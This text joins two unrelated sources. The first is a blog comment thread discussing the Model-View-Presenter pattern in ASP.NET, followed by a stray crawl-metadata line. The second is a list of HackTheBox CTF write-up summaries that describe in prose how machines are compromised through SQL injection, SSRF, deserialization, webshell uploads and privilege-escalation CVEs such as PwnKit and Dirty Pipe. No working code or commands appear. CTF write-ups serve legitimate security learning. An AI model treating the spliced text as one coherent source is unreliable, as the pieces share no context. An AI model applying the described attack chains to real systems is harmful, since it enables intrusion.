When customer z looks at the demo application and says, I want that to error to be a popup box, You create new implimentor of IRequireContactUsValidation changing only the implimentation of the IsValid properties. If the rules for validation changes then you make a new IValidateContactUs implementor.
Ug i totally biffed what i ment to say. IValidateContactUs was ment to look like:
IValidateContactUs
void ValidateContactUs();
Implementors would need to take a IReaderContactUs in the constructor.
That way the Implementor of IReaderContactUs would worry about Displaying the errors and not validating the error. Opps.
Hmmm... this is a tough one to recommend. Involved in a project using a very similar type of presenter pattern and it has convoluted the code immensely.
jc, I've been using this pattern, and variations on it for years. And i don't thin there is any convolution going on. Especially when you use the same presenter in more than one place. Then it really pays off.
Yes this is a very good example of learning MVP Pattern. The thing which remains in this is Model and Provider Part.
Model basically concentrate data only.And again which is going to be filled by presenter. Model is present inside the View.
Provider is the one which is used to get Data from the Web Services in Asp.Net and fills the Model and give that to Presenter and then presenter provide back that to UI.
With the help of the INETA.org speakers bureau, I've made my way to St. Louis to talk to the local user
Nice example Scott.
Here's another great discussion about the design pattern presented here.
polymorphicpodcast.com/.../mv%2Dpatterns
Enjoy!
Scott,
I just finished listening to your DNR interview.
The one thing you mentioned that I had not considered was the reuse of a presenter. Your example was: you would need a presenter to fetch and display a set of questions, but you could then reuse that presenter for a page to edit those questions because you still need to fetch and display them.
In this type of reuse, would you define more than 1 type of presenter in the Init of the webfore (i.e. fetchPresenter and editPresenter) and then call into each one depending on the situation?
Chris May,
You have to ask this question. Are you ever going to use the updatePresenter in a place that the readPresenter is not used?
Two scenarios, two solutions. Let's say you decide that they're always going to be coupled. You think that the edit form, always needs to be read first, to supply the original values. In this case you can use inheritance and the updateView and inherit from the readView.
This breaks down when you look at the single point of responsibility though. now you have a presenter that forces you to both do reads and updates.
And it breaks when you want to do something like a web service that takes data for an update. The web service shouldn't be forced to fetch the data first to update it.
So I keep the read and the update as separate concerns. Then yes, to answer your question, I establish the null presenter in the body of the page
(same place as ... private ContactUsPresenter presenter; in the above code example)
Then you can initialize them in the oninit, or closer to the point of use.
Thanks Scott!
Pingback from The Usual Dosage » Post Topic » Why MVP Is and Isn???t the Answer
This is really a very helpful example.
MVP >>now seems very easy for me to implement.
Thanks
Never call the presenter direct like you are doing with presenter.ProcessForm();.
So instead of this direct call. Create an eventhandler.
The presenter subscribes on this event that the page code behind makes.
You want a loose connection between the UI and presenter. For nunit testing purposes.
For the validation you can use validation on the page that is connected to validation on the domain objects.
Use the enterprise validation.
A validation is made before saving the anything to layers below.
Then a validation can be made in lower layers also. If access to lower layers through other ways than the presenter. Maybe through web services.
In some cases a direct validation can be preferred in the UI. So that the user does not have to fill in everything and then notice what is missing.
But every pattern can be adjusted for your own special needs. It is all up to you.
Pingback from ASP.NET MVC Archived Buzz, Page 1
Pingback from ASP.NET MVC Archived Blog Posts, Page 1
How can we create a test case with this example using NUnit ?
Hi, I am new in MVP, I have a question here, Can i use DTO here insteed of Interfaces or why didn't you use DTP here because DTO common amoung all the layers.
Technically you can use a DTO, or anything else that would create your contract. BUT ... it's a bad idea. If you use a DTO you're forced to actually have an object to send around.
The reason the Interface is so nice is because you don't know (or care) about the implementation, you just care that it is implemented.
Hello,
If I don't use a DTO, how would I display things like a grid or a list? I would kinda need to pass some kind of object because transforming all that do simple type is going to be a bit messy. I was thinking of something in the line of list<Customer> for example. Also, I think that would fall within the line of the ViewModel idea that is being toss around in the past couple of years. | http://weblogs.asp.net/scottcate/archive/2007/04/12/very-quick-mvp-pattern-to-use-with-asp-net.aspx | crawl-002 | refinedweb | 2,010 | 66.54 |
Source code for the CMS6R2 built in workflows
EPiServer CMS6 R2 is shipped with four built in workflows (the same workflows that has been shipped with CMS since version 5). The workflows that are built in are two variants of page approval workflows, on request for feedback workflow and one request for translation workflow.
We share the source code for the built in workflows both so partners can change the behavior of the workflows and also serve as an inspiration for your own implementations.
Here is the source code for the CMS 6R2 versions of the workflows.
In the old post where the CMS5 versions of the source code where shared there is also a document that describes how to deploy them to a site. That document is still valid except for some namespace changes.
Nice! Thanks for posting an update. :)
Just wanted to supplement this with a link to Mark Everard's blog where he shows you how to create custom workflows for EPiServer CMS:
Hi,
Can you please let me know how to integrate the workflow in existing Episerver CMS R2.
Following things I Changed.
1) in EPiserver.config file.
2) Uploaded Dll files in the bin folder.
3) Able to view the Workflow, but when triggering. getting the below error in start parameter.
Could not load the given control from/util/WorkflowsUI/WorkflowApprovalStart.ascx:Unknown server tag 'EPiServerWorkflow:History'.
Thanks in advance. | https://world.optimizely.com/blogs/Johan-Bjornfot/Dates1/2011/8/Source-code-for-the-CMS6R2-built-in-workflows/ | CC-MAIN-2021-49 | refinedweb | 235 | 73.98 |
HTB: Seventeenctf htb-seventeen hackthebox nmap feroxbuster wfuzz vhost exam-management-system searchsploit sqli boolean-based-sqli sqlmap crackstation roundcube cve-2020-12640 upload burp burp-proxy docker credentials password-reuse javascript node npm verdaccio home-env malicious-node-module htb-blunder
Seventeen presented a bunch of virtual hosts, each of which added some piece to eventually land execution. The exam site has a boolean-based SQL injection, which provides access to the database, which leaks another virtual host and it’s DB. The oldmanagement system provides file upload, and leaks the hostname of a Roundcube webmail instance. I’ll upload a webshell and exploit CVE-2020-12640 in Roundcube to include it and get execution. There’s two pivots of password reuse, before getting root by installing a malicious Node module from a rogue NPM server. In Beyond Root, I’ll look at why root uses the .npmrc file from kavi’s home directory and unintended bypassing the htaccess file for webshell execution.
HTB: StreamIOhackthebox htb-streamio ctf nmap windows domain-controller php wfuzz vhosts crackmapexec feroxbuster sqli sqli-union waf hashcat hydra lfi rfi burp burp-repeater mssql sqlcmd evil-winrm firefox firepwd bloodhound bloodhound-python laps htb-hancliffe
StreamIO is a Windows host running PHP but with MSSQL as the database. It starts with an SQL injection, giving admin access to a website. Then there’s a weird file include in a hidden debug parameter, which eventually gets a remote file include giving execution and a foothold. With that I’ll gain access to a high privileged access to the db, and find another password in a backup table. From that user, I’ll fetch saved Firefox credentials, and use those to read a LAPS password and get an administrator shell.
HTB: Scannedctf hackthebox htb-scanned nmap django source-code chroot jail sandbox-escape makefile ptrace fork dumbable c python youtube hashcat shared-object.
HTB: Noterctf hackthebox htb-noter nmap ftp python flask flask-cookie flask-unsign feroxbuster wfuzz source-code md-to-pdf command-injection mysql raptor shared-object
Noter starts by registering an account on the website and looking at the Flask cookie. It’s crackable, but I don’t have another user’s name or anything else to fake of value. I’ll show a couple different ways to find a username, by generating tons of valid cookies and testing them, and by using the login error messages to find a valid username. With access as a higher priv user on the website, I get creds to the FTP server, where I find the default password scheme, and use that to pivot to the FTP admin. As admin, I get the site source, and find a RCE, both the intended way exploiting a markdown to PDF JavaScript library, as well as an unintended command injection. To get root, I’ll find MySQL running as root and use the Raptor exploit to get command execution through MySQL.
HTB: Talkativehackthebox ctf htb-talkative nmap wfuzz jamovi bolt-cms feroxbuster rocket-chat r-lang docker webhook twig ssti mongo deepce shocker cap-dac-read-search htb-paper htb-anubis htb-registry
Talkative is about hacking a communications platform. I’ll start by abusing the built-in R scripter in jamovi to get execution and shell in a docker container. There I’ll find creds for the Bolt CMS instance, and use those to log into the admin panel and edit a template to get code execution in the next container. From that container, I can SSH into the main host. From the host, I’ll find a different network of containers, and find MongoDB running in one. I’ll connect to that and use it to get access as admin for a Rocket Chat instance. I’ll abuse the Rocket Chat webhook functionality to get a shell in yet another Docker container. This container has a dangerous capabilities,
CAP_DAC_READ_SEARCH, which I’ll abuse to both read and write files on the host.
HTB: Timelapsectf htb-timelapse hackthebox nmap windows active-directory crackmapexec smbclient laps zip2john john pfx2john evil-winrm winrm-keys powershell-history htb-pivotapi
Timelapse is a really nice introduction level active directory box. It starts by finding a set of keys used for authentication to the Windows host on an SMB share. I’ll crack the zip and the keys within, and use Evil-WinRM differently than I have shown before to authenticate to Timelapse using the keys. As the initial user, I’ll find creds in the PowerShell history file for the next user. That user can read from LAPS, the technology that helps to keep local administrator passwords safe and unique. With that read access, I’ll get the administrator password and use Evil-WinRM to get a shell.
HTB: Retiredctf hackthebox htb-retired nmap feroxbuster upload directory-traversal local-file-read filter bof wfuzz ghidra reverse-engineering proc maps gdb pattern mprotect rop jmp-rsp msfvenom shellcode python symlink make capabilities cap-dac-override binfmt-misc sched_debug htb-previse htb-fingerprint execute-after-redirect
Retired starts out with a file read plus a directory traversal vulnerability. (There’s also an EAR vulnerability that I originally missed, but added in later). With that, I’ll get a copy of a binary that gets fed a file via an upload on the website. There’s a buffer overflow, which I can exploit via an uploaded file. I’ll use ROP to make the stack executable, and then run a reverse shell shellcode from it. With a shell, I’ll throw a symlink into a backup directory and get an SSH key from the user. To get root, I’ll abuse binfmt_misc. In Beyond Root, some loose ends that were annoying me.
HTB: Overgraphhtb-overgraph ctf hackthebox nmap wfuzz vhosts feroxbuster graphql angularjs otp nosql-injection graphql-playground graphql-voyager local-storage csti xss reflective-xss csrf ffmpeg ssrf local-file-read exploit patchelf ghidra checksec python gdb youtube pwntools.
HTB: Latehtb-late ctf hackthebox nmap ocr flask kolourpaint tesseract burp-repeater ssti jinja2 payloadsallthethings linpeas pspy bash chattr lsattr extended-attributes youtube
Late really had two steps. The first is to find a online image OCR website that is vulnerable to server-side template injection (SSTI) via the OCRed text in the image. This is relatively simple to find, but getting the fonts correct to exploit the vulnerability is a bit tricky. Still, some trial and error pays off, and results in a shell. From there, I’ll identify a script that’s running whenever someone logs in over SSH. The current user has append access to the file, and therefore I can add a malicious line to the script and connect over SSH to get execution as root. In Beyond Root, a YouTube video showing basic analysis of the webserver, from NGINX to Gunicorn to Python Flask.
HTB: Catchctf hackthebox htb-catch nmap apk android feroxbuster gitea swagger lets-chat cachet jadx mobsf api cve-2021-39172 burp burp-repeater wireshark redis php-deserialization deserialization phpggc laravel cve-2021-39174 cve-2021-39165 sqli ssti sqlmap docker bash command-injection apktool htb-routerspace flare-on-flarebear
Catch requires finding an API token in an Android application, and using that to leak credentials from a chat server. Those credentials provide access to multiple CVEs in a Cachet instance, providing several different paths to a shell. The intended and most interesting is to inject into a configuration file, setting my host as the redis server, and storing a malicious serialized PHP object in that server to get execution. To escalate to root, I’ll abuse a command injection vulnerability in a Bash script that is checking APK files by giving an application a malicious name field.
HTB: Acutehackthebox ctf htb-acute nmap feroxbuster powershell-web-access exiftool meterpreter metasploit msfvenom defender defender-bypass-directory screenshare credentials powershell-runas powershell-configuration
Acute is a really nice Windows machine because there’s nothing super complex about the attack paths. Rather, it’s just about manuverting from user to user using shared creds and privilieges available to make the next step. It’s a pure Windows box. There’s two hosts to pivot between, limited PowerShell configurations, and lots of enumeration.
HTB: RouterSpacehackthebox htb-routerspace ctf nmap ubuntu android apk feroxbuster apktool reverse-engineering android-react-native react-native genymotion burp android-burp command-injection linpeas pwnkit cve-2021-4034 polkit cve-2021-3560 cve-2021-22555 baron-samedit cve2021-3156 htb-paper
RouterSpace was all about dynamic analysis of an Android application. Unfortunately, it was a bit tricky to get setup and working. I’ll use a system-wide proxy on the virtualized Android device to route traffic through Burp, identifying the API endpoint and finding a command injection. For root, I’ll exploit the Baron Samedit vulnerability in sudo that came our in early 2021.
HTB: Undetectedhackthebox htb-undetected ctf nmap feroxbuster php wfuzz vhosts composer phpunit cve-2017-9841 webshell reverse-engineering ghidra awk backdoor hashcat apache-mod sshd
Undetected follows the path of an attacker against a partially disabled website. I’ll exploit a misconfigured PHP package to get execution on the host. From there, I’ll find a kernel exploit left behind by the previous attacker, and while it no longer works, the payload shows how it modified the passwd and shadow files to add backdoored users with static passwords, and those users are still present. Further enumeration finds a malicious Apache module responsible for downloading and installing a backdoored sshd binary. Reversing that provides a password I can use to get a root shell.
HTB: Phoenixhackthebox htb-phoenix ctf htb-pressed htb-static nmap wordpress wpscan wp-pie-register wp-asgaros-forum sqli injection time-based-sqli sqlmap hashcat 2fa wp-miniorange totp youtube source-code crypto cyberchef oathtool wp-download-from-files webshell upload pam sch unsch pspy proc wildcard
Phoenix starts off with a WordPress site using a plugin with a blind SQL injection. This injection is quite slow, and I think leads to the poor reception for this box overall. Still, very slow blind SQL injection shows the value in learning to pull out only the bits you need from the DB. I’ll get usernames and password hashes, but that leaves me at a two factors prompt. I’ll reverse enginner that plugin to figure out what I need from the DB, and get the seed to generate the token. From there, I’ll abuse another plugin to upload a webshell and get a shell on the box. The first pivot involves password reuse and understanding the pam 2FA setup isn’t enabled on one interface. The next pivot is wildcard injection in a complied shell script. I’ll dump the script out (several ways), and then use the injection to get a shell as root.
HTB: Paperhackthebox ctf htb-paper nmap feroxbuster wfuzz vhosts wordpress wpscan rocket-chat cve-2019-17671 directory-traversal password-reuse credentials crackmapexec linpeas cve-2021-3156 cve-2021-4034 pwnkit cve-2021-3650
Paper is a fun easy-rated box themed off characters from the TV show “The Office”. There’s a WordPress vulnerability that allows reading draft posts. In a draft post, I’ll find the URL to register accounts on a Rocket Chat instance. Inside the chat, there’s a bot that can read files. I’ll exploit a directory traversal to read outside the current directory, and find a password that can be used to access the system. To escalate from there, I’ll exploit a 2021 CVE in PolKit. In Beyond Root, I’ll look at a later CVE in Polkit, Pwnkit, and show why Paper wasn’t vulnerable, make it vulnerable, and exploit it.
HTB: Metahackthebox ctf htb-meta nmap wfuzz vhosts wfuzz feroxbuster exiftool composer cve-2021-22204 command-injection pspy mogrify cve-2020-29599 polyglot hackvent imagemagick imagemagick-scripting-language neofetch gtfobins source-code
Meta was all about image processing. It starts with an image metadata service where I’ll exploit a CVE in exfiltool to get code execution. From there, I’ll exploit a cron running an ImageMagick script against uploaded files using an SVC/ImageMagick Scripting Language polyglot to get shell as the user. For root, I’ll abuse neofetch and environment variables.
HTB: Timinghackthebox ctf htb-timing nmap php feroxbuster wfuzz lfi directory-traversal source-code side-channel timing python bash youtube mass-assignment burp burp-repeater webshell firewall git password-reuse credentials axel sudo-home htb-backendtwo
Timing starts out with a local file include and a directory traversal that allows me to access the source for the website. I’ll identify and abuse a timing attack to identify usernames on a login form. After logging in, there’s a mass assignment vulnerability that allows me to upgrade my user to admin. As admin, I’ll use the LFI plus upload to get execution. To root, I’ll abuse a download program to overwrite root’s authorized_keys file and get SSH access. In Beyond Root, I’ll look at an alternative root, and dig more into mass assignment vulnerabilities.
SetUID Rabbit Holectf htb-jail suid linux execve c nfs setuid seteuid setresuid
In looking through writeups for Jail after finishing mine, I came across an interesting rabbit hole, which led me down the path of a good deal of research, where I learned interesting detail related to a few things I’ve been using for years. I’ll dive into Linux user IDs and SetUID / SUID, execve vs system, and sh vs bash, and test out what I learn on Jail.
HTB: AdmirerToohtb-admirertoo hackthebox ctf nmap feroxbuster vhosts wfuzz adminer cve-2021-21311 ssrf adminer-oneclick-login opentsdb python flask cve-2020-35476 credentials opencats fail2ban cve-2021-25294 upload cve-2021-32749 whois hydra wireshark ncat htb-forge
AdmirerToo is all about chaining exploits together. I’ll use a SSRF vulnerability in Adminer to discover a local instance of OpenTSDB, and use the SSRF to exploit a command injection to get a shell. Then I’ll exploit a command injection in Fail2Ban that requires I can control the result of a whois query about my IP. I’ll abuse a file write vulnerability in OpenCats to upload a malicious whois.conf, and then exploit fail2ban getting a shell. In Beyond Root, I’ll look at the final exploit and why nc didn’t work for me at first, but ncat did.
HTB: Jailhackthebox htb-jail ctf nmap centos nfs feroxbuster bof source-code gdb peda pwntools shellcode socket-reuse nfs-nosquash rvim gtfobins rar quipquip crypto hashcat hashcat-rules atbash rsa rsactftool facl getfacl htb-laboratory htb-tartarsauce
Jail is an old HTB machine that is still really nice to play today. There’s a bunch of interesting fundamentals to work through. It starts with a buffer overflow in a jail application that can be exploited to get execution. It’s a very beginner BOF, with stack execution enabled, access to the source, and a way to leak the input buffer address. From there, I’ll abuse an NFS share without user squashing to escalate to the next user. Then there’s an rvim escape to get the next user. And finally a crypto challenge to get root. Jail sent me a bit down the rabbit hole on NFS, so some interesting exploration in Beyond Root, including an alternative way to make the jump from frank to adm.
HTB: Pandoractf hackthebox htb-pandora nmap feroxbuster vhosts snmp snmpwalk snmpbulkwalk mibs python python-dataclass pandora-fms cve-2021-32099 sqli injection sqli-union sqlmap auth-bypass cve-2020-13851 command-injection upload webshell path-hijack mpm-itk apache youtube htb-sneaky htb-openkeys
Pandora starts off with some SNMP enumeration to find a username and password that can be used to get a shell. This provides access to a Pandora FMS system on localhost, which has multiple vulnerabilities. I’ll exploit a SQL injection to read the database and get session cookies. I can exploit that same page to get admin and upload a webshell, or exploit another command injection CVE to get execution. To get root, there’s a simple path hijack in a SUID binary, but I will have to switch to SSH access, as there’s a sandbox in an Apache module preventing my running SUID as root while a descendant process of Apache. I’ll explore that in depth in Beyond Root.
HTB: Miraihackthebox htb-mirai ctf nmap raspberrypi feroxbuster plex pihole default-creds deleted-file extundelete testdisk photorec
Mirai was a RaspberryPi device running PiHole that happens to still have the RaspberryPi default usename and password. That user can even sudo to root, but there is a bit of a hitch at the end. I’ll have to recover the deleted root flag from a usb drive.
HTB: Brainfuckhtb-brainfuck hackthebox ctf nmap vhosts wordpress ubuntu wpscan wp-support-plus crypto auth-bypass smtp email vigenere john rsa lxc lxd sudo htb-spectra htb-tabby
Brainfuck was one of the first boxes released on HackTheBox. It’s a much more unrealistic and CTF style box than would appear on HTB today, but there are still elements of it that can be a good learning opportunity. There’s WordPress exploitation and a bunch of crypto, including RSA and Vigenere.
HTB: Fingerprintctf hackthebox htb-fingerprint nmap ubuntu ubuntu-1804 python werkzeug feroxbuster execute-after-redirect burp burp-repeater burp-proxy glassfish java browser-fingerprint source-code directory-traversal flask proc hql hql-injection boolean-injection youtube xss jwt jwt-io deserialization java-deserialization maven jd-gui java-byte-code tunnel crypto aes aes-ecb padding-attack htb-previse
For each step in Fingerprint, I’ll have to find multiple vulnerabilities and make them work together to accomplish some goal. To get a shell, I’ll abuse a execute after return (EAR) vulnerability, a directory traversal, HQL injection, cross site scripting, to collect the pieces necessary for the remote exploit. I’ll generate a custom Java serialized payload and abuse a shared JWT signing secret to get execution and a shell. To get to the next user I’ll need to brute force an SSH key character by character using a SUID program, and find the decryption password in a Java Jar. To get root, I’ll need to abuse a new version of one of the initial webservers, conducting a padding attack on the AES cookie to force a malicious admin cookie, and then use the directory traversal to read the root SSH key.
HTB: Fulcrumctf hackthebox htb-fulcrum nmap ubuntu windows feroxbuster api xxe burp burp-repeater python ssrf rfi qemu tunnel powershell powershell-credential chisel evil-winrm web-config ldap powerview credentials htb-reel htb-omni
Fulcrum is a 2017 release that got a rebuild in 2022. It’s a Linux server with four websites, including one that returns Windows .NET error messages. I’ll exploit an API endpoint via XXE, and use that as an SSRF to get execution through a remote file include. From there I’ll pivot to the Windows webserver with some credentials, enumeration LDAP, pivot to the file server, which can read shares on the DC. In those shares, I’ll find a login script with creds associated with one of the domain admins, and use that to read the flag from the DC, as well as to get a shell. This box has a lot of tunneling, representing a small mixed-OS network on one box.
HTB: Unicodectf htb-unicode hackthebox nmap flask python jwt-io feroxbuster jwt-rsa open-redirect filter waf unicode unicode-normalization directory-traversal credentials share pyinstaller pyinstxtractor uncompyle6 parameter-injection htb-backdoor.
HTB: Returnctf hackthebox htb-return nmap windows crackmapexec printer feroxbuster ldap wireshark evil-winrm server-operators service service-hijack windows-service htb-fuse htb-blackfield
Return was a straight forward box released for the HackTheBox printer track. This time I’ll abuse a printer web admin panel to get LDAP credentials, which can also be used for WinRM. The account is in the Server Operators group, which allows it to modify, start, and stop services. I’ll abuse this to get a shell as SYSTEM.
HTB: Antiquehtb-antique hackthebox ctf printer nmap jetdirect telnet python snmp snmpwalk tunnel chisel cups cve-2012-5519 hashcat shadow cve-2015-1158 pwnkit shared-object cve-2021-4034
Antique released non-competitively as part of HackTheBox’s Printer track. It’s a box simulating an old HP printer. I’ll start by leaking a password over SNMP, and then use that over telnet to connect to the printer, where there’s an exec command to run commands on the system. To escalate, I’ll abuse an old instance of CUPS print manager software to get file read as root, and get the root flag. In Beyond Root, I’ll look at two more CVEs, another CUPS one that didn’t work because no actual printers were attached, and PwnKit, which does work.
HTB: BackendTwohtb-backendtwo ctf uhc hackthebox nmap uvicorn python api json jq wfuzz feroxbuster swagger fastapi jwt pyjwt jwt-io simple-modify-headers credentials pam-wordle mass-assignment cyberchef htb-backdoor htb-altered
BackendTwo is this month’s UHC box. It builds on the first Backend UHC box, but with some updated vulnerabilities, as well as a couple small repeats from steps that never got played in UHC competition. It starts with an API that I’ll fuzz to figure out how to register. Then I’ll abuse a mass assignment vulnerability to give my user admin privs. From there, I can use a file read endpoint read /proc to find the page source, and eventually the signing secret for the JWT. With that, I can forge a new token allowing access to the file write api, where I’ll quietly insert a backdoor into an endpoint that returns a shell (and show how to just smash the door in as well). To escalate, it’s password reuse and cheating at pam-wordle.
HTB: Searchhtb-search hackthebox ctf nmap domain-controller active-directory vhosts credentials feroxbuster smbmap smbclient password-spray ldapsearch ldapdomaindump jq bloodhound-py bloodhound kerberoast hashcat crackmapexec msoffice office excel certificate pfx2john firefox-certificate certificate client-certificate powershell-web-access gmsa youtube
Search was a classic Active Directory Windows box. It starts by finding credentials in an image on the website, which I’ll use to dump the LDAP for the domain, and find a Kerberoastable user. There’s more using pivoting, each time finding another clue, with spraying for password reuse, credentials in an Excel workbook, and access to a PowerShell web access protected by client certificates. With that initial shell, its a a few hops identified through Bloodhound, including recoving a GMSA password, to get to domain admin.
HTB: Rabbitctf htb-rabbit hackthebox nmap iis apache wamp feroxbuster owa exchange joomla complain-management-system searchsploit sqli burp burp-repeater sqlmap crackstation phishing openoffice macro certutil powershellv2 webshell schtasks attrib htb-sizzle htb-fighter
Rabbit was all about enumeration and rabbit holes. I’ll work to quickly eliminate vectors and try to focus in on ones that seem promising. I’ll find an instance of Complain Management System, and exploit multiple SQL injections to get a dump of hashes and usernames. I’ll use them to log into an Outlook Web Access portal, and use that access to send phishing documents with macros to get a shell. From there, I’ll find one of the webservers running as SYSTEM and write a webshell to get a shell. In Beyond Root, a look at a comically silly bug in the Complain Management System’s forgot password featuer, as well as at the scheduled tasks on the box handling the automation.
HTB: Fighterhtb-fighter hackthebox ctf nmap iis vhosts wfuzz feroxbuster sqli burp burp-repeater xp-cmdshell nishang windows-firewall applocker driverquery capcom-sys ghidra python msbuild applocker-bypass msfvenom msfconsole metasploit juicypotato htb-fuse
Fighter is a solid old Windows box that requires avoiding AppLocker rules to exploit an SQL injection, hijack a bat script, and exploit the imfamous Capcom driver. I’ll show the intended path, as well as some AppLocker bypasses, how to modify the Metasploit Capcom exploit to work, and JuicyPotato (which was born from this box).
Parallelizing in Bash and Pythonhtb-backdoor ctf hackthebox python bash bash-async async python-async youtube programming brute-force
To solve the Backdoor box from HackTheBox, I used a Bash script to loop over 2000 pids using a directory traversal / local file read vulnerability and pull their command lines. I wanted to play with parallelizing that attack, both in Bash and Python. I’ll share the results in this post / YouTube video.
HTB: Backdoorhtb-backdoor ctf hackthebox nmap wordpress wpscan feroxbuster exploit-db directory-traversal ebooks-download proc bash msfvenom gdb gdbserver gdb-remote metasploit screen htb-pressed
Backdoor starts by finding a WordPress plugin with a directory traversal bug that allows me to read files from the filesystem. I’ll use that to read within the /proc directory and identify a previously unknown listening port as gdbserver, which I’ll then exploit to get a shell. To get to root, I’ll join a screen session running as root in multiuser mode.
HTB: Ariekeictf hackthebox htb-ariekei nmap vhosts wfuzz youtube waf feroxbuster cgi shellshock cve-2014-6271 image-tragick image-magick cve-2016-3714 docker pivot password-reuse tunnel ssh2john hashcat htb-shocker
Ariekei is an insane-rated machine released on HackTheBox in 2017, focused around two very well known vulnerabilities, Shellshock and Image Tragic. I’ll find Shellshock very quickly, but not be able to exploit it due to a web application firewall. I’ll turn to another virtual host where there’s an image upload, and exploit Image Tragic to get a shell in a Docker container. I’ll use what I can enumerate about the network of docker containers and their secrets to to pivot to a new container that can talk directly to the website that’s vulnerable to Shellshock without the WAF, and exploit it to get access there. After escalating, I’ll find an SSH key that provides access to the host, and abuse the docker group to escalate to root.
HTB: Tobyhackthebox ctf htb-toby nmap vhosts wfuzz wordpress backdoor wpscan gogs git source-code feroxbuster cyberchef crypto php-deobfuscation wireshark python youtube docker pivot hashcat chisel pam ghidra htb-kryptos
Toby was a really unique challenge that involved tracing a previous attackers steps and poking a backdoors without full information about how they work. I’ll start by getting access to PHP source that shows where a webshell is loaded, but not the full execution. I’ll have to play with it to get it to give execution, figuring out how it communicates. From there I’ll pivot into a MySQL container and get hashes to get into the Gogs instance. Source code analysis plus some clever password generation allows me to pivot onto the main host, where I’ll have to use trouble tickets to find a PAM backdoor and brute force the password.
HTB: Jeeveshtb-jeeves hackthebox ctf nmap windows feroxbuster gobuster jetty jenkins keepass kpcli hastcat passthehash crackstation psexec-py alternative-data-streams htb-object
Jeeves was first released in 2017, and I first solved it in 2018. Four years later, it’s been an interesting one to revisit. Some of the concepts seem not that new and exciting, but it’s worth remembering that Jeeves was the first to do them. I’ll start with a webserver and find a Jenkins instance with no auth. I can abuse Jenkins to get execution and remote shell. From there, I’ll find a KeePass database, and pull out a hash that I can pass to get execution as Administrator. root.txt is actually hidden in an alternative data stream.
HTB: Backendhtb-backend ctf hackthebox nmap api json uvicorn feroxbuster wfuzz swagger fastapi python jwt pyjwt jwt-io simple-modify-headers burp credentials uhc
Backend was all about enumerating and abusing an API, first to get access to the Swagger docs, then to get admin access, and then debug access. From there it allows execution of commands, which provides a shell on the box. To escalate to root, I’ll find a root password in the application logs where the user must have put in their password to the name field.
HTB: Tallyhackthebox ctf htb-tally nmap windows sharepoint mssql keepass hashcat kpcli crackmapexec smbclient mssqlclient xp-cmdshell firefox user-agent searchsploit cve-2016-1960 shellcode python scheduled-task rottenpotato sweetpotato cve-2017-0213 visual-studio windows-sessions msfvenom metasploit migrate
Tally is a difficult Windows Machine from Egre55, who likes to make boxes with multiple paths for each step. The box starts with a lot of enumeration, starting with a SharePoint instance that leaks creds for FTP. With FTP access, there are two paths to root. First there’s a KeePass db with creds for SMB, which has a binary with creds for MSSQL, and I can use MSSQL access to run commands and get a shell. Alternatively, I can spot a Firefox installer and a note saying that certain HTML pages on the FTP server will be visited regularly, and craft a malicious page to exploit that browser. To escalate, there’s a scheduled task running a writable PowerShell script as administrator. There’s also SeImpersonate privilege in a shell gained via MSSQL, which can be leveraged to get root as well. Finally, I’ll show a local Windows exploit that was common at the time of the box release, CVE-2017-0213.
HTB: Overflowhackthebox htb-overflow ctf nmap ubuntu cookie padding-oracle python feroxbuster padbuster vhosts sqli sqlmap hashcat cmsmadesimple cve-2021-22204 exiftool password-reuse facl getfacl hosts time-of-check-time-of-use ghidra bof crypto gdb youtube htb-lazy.
HTB: Minionhtb-minion hackthebox ctf nmap windows asp aspx iis feroxbuster webshell wfuzz ssrf icmp-exfil youtube python powershell python-cmd powershell-runas alternative-data-streams crackstation ghidra htb-nest
Minion is four and a half years old, but it’s still really difficult. The steps themselves are not that hard, but the difficulty comes with the firewall that only allows ICMP out. So while I find a blind command execution relatively quickly, I’ll have to write my own shell using Python and PowerShell to exfil data over pings. The rest of the steps are also not hard on their own, just difficult to work through my ICMP shell. I’ll hijack a writable PowerShell script that runs on a schedule, and then find a password from the Administrator user in an alternative data stream on a backup file to get admin access.
HTB: Inceptionctf hackthebox htb-inception nmap dompdf feroxbuster squid proxychains wfuzz container lxd php-filter webdav davtest wireshark webshell forward-shell wordpress ping-sweep tftp apt apt-pre-invoke youtube htb-joker htb-granny
Inception was one of the first boxes on HTB that used containers. I’ll start by exploiting a dompdf WordPress plugin to get access to files on the filesystem, which I’ll use to identify a WedDAV directory and credentials. I’ll abuse WebDAV to upload a webshell, and get a foothold in a container. Unfortunately, outbound traffic is blocked, so I can’t get a reverse shell. I’ll write a forward shell in Python to get a solid shell. After some password reuse and sudo, I’ll have root in the container. Looking at the host, from the container I can access FTP and TFTP. Using the two I’ll identify a cron running apt update, and write a pre-invoke script to get a shell.
HTB: Shibbolethctf htb-shibboleth hackthebox nmap vhosts wfuzz feroxbuster zabbix ipmi msfconsole msfvenom shared-object rakp ipmipwner hashcat password-reuse credentials mysql cve-2021-27928 youtube htb-zipper oscp-like
Shibboleth starts with a static website and not much else. I’ll have to identify the clue to look into BMC automation and find IPMI listening on UDP. I’ll leak a hash from IPMI, and crack it to get creds to a Zabbix instance. Within Zabbix, I’ll have the agent run a command, providing a foothold. Some credential reuse pivots to the next user. To get root, I’ll exploit a CVE in MariaDB / MySQL. In Beyond Root, a video reversing the shared object file I used in that root exploit, as well as generating my own in C.
HTB: Alteredctf hackthebox htb-altered uhc nmap laravel php type-juggling password-reset wfuzz bruteforce feroxbuster rate-limit sqli sqli-file sqli-union burp burp-repeater webshell dirtypipe cve-2022-0847 pam-wordle passwd ghidra reverse-engineering htb-ransom
Altered was another Ultimate Hacking Championship (UHC) box that’s now up on HTB. This one has another Laravel website. This time I’ll abuse the password reset capability, bypassing the rate limiting using HTTP headers to brute force the pin. Once in, I’ll find a endpoint that’s vulnerable to SQL injection, but only after abusing type-juggling to bypass an integrity check. Using that SQL injection, I’ll write a webshell and get a foothold. To get to root, I’ll abuse Dirty Pipe, with a twist. Most of the scripts to exploit Dirty Pipe modify the passwd file, but this box has pam-wordle installed, so you much play a silly game of tech-based Wordle to auth. I’ll show both how to solve this, and how to use a different technique that overwrites a SUID executable. In Beyond Root, I’ll reverse how that latter exploit works.
HTB: Secrethackthebox htb-secret ctf nmap jwt pyjwt express feroxbuster api source-code git command-injection pr-set-dumpable suid crash-dump var-crash appport-unpack core-dump
To get a foothold on Secret, I’ll start with source code analysis in a Git repository to identify how authentication works and find the JWT signing secret. With that secret, I’ll get access to the admin functions, one of which is vulnerable to command injection, and use this to get a shell. To get to root, I’ll abuse a SUID file in two different ways. The first is to get read access to files using the open file descriptors. The alternative path is to crash the program and read the content from the crashdump.
